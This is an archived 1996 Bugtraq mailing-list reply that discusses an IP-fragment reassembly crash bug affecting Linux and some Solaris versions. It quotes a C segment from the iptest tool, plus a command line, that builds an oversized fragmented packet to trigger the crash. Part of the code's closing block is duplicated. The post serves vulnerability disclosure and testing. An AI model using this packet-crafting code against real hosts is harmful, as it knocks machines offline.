[3549] in bugtraq
Re: Urgent !! Serious Linux Security Bug....
daemon@ATHENA.MIT.EDU (Darren Reed)
Tue Oct 22 15:18:26 1996
Date: Tue, 22 Oct 1996 23:44:06 +1000
Reply-To: Darren Reed <avalon@coombs.anu.edu.au>
From: Darren Reed <avalon@coombs.anu.edu.au>
X-To: usa@win95.com
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <3269053B.3D6F@win95.com> from "Jake the Prince" at Oct 19,
96 06:43:39 pm
Solaris2 was, I believe, vulnerable to this bug too.
From the "Crashable" file for iptest:
Solaris 2.4 - upto and including 101945-34, > 34 ?
Solaris 2.5 - 11/95
(Yes, I stumbled upon this about the same time last year, but don't exactly
have the time or resources to check everything under the sun, especially
new operating systems...)
For those with it handly, "iptest -1 -p 8".
but I built in some random lossage which may stop it triggering the bug.
I think if the lossage is taken out, some systems will try to reassemble
it all into a buffer which (of course), is at max. 64k in size.
However, it doesn't try to send an ICMP packet, the following segment of
code is what triggeres it:
if (!ptest || (ptest == 8)) {
struct timeval tv;
gettimeofday(&tv, NULL);
srand(tv.tv_sec ^ getpid() ^ tv.tv_usec);
/*
* Part8: 63k packet + 1k fragment at offset 0x1ffe
*/
ip->ip_off = IP_MF;
u->uh_dport = htons(9);
ip->ip_id = htons(id++);
printf("1.8. 63k packet + 1k fragment at offset 0x1ffe\n");
ip->ip_len = 768 + 20 + 8;
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip 0\n");
ip->ip_len = MIN(768 + 20, mtu - 68);
i = 512;
for (; i < (63 * 1024 + 768); i += 768) {
ip->ip_off = IP_MF | (i >> 3);
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip %d\n", i);
fflush(stdout);
PAUSE();
}
ip->ip_len = 896 + 20;
ip->ip_off = IP_MF | (i >> 3);
if ((rand() & 0x1f) != 0) {
(void) send_ip(nfd, mtu, ip, gwip, 1);
printf("%d\r", i);
} else
printf("skip\n");
putchar('\n');
fflush(stdout);
}
Don't work against any system using a BSD based IP networking code.
Darren
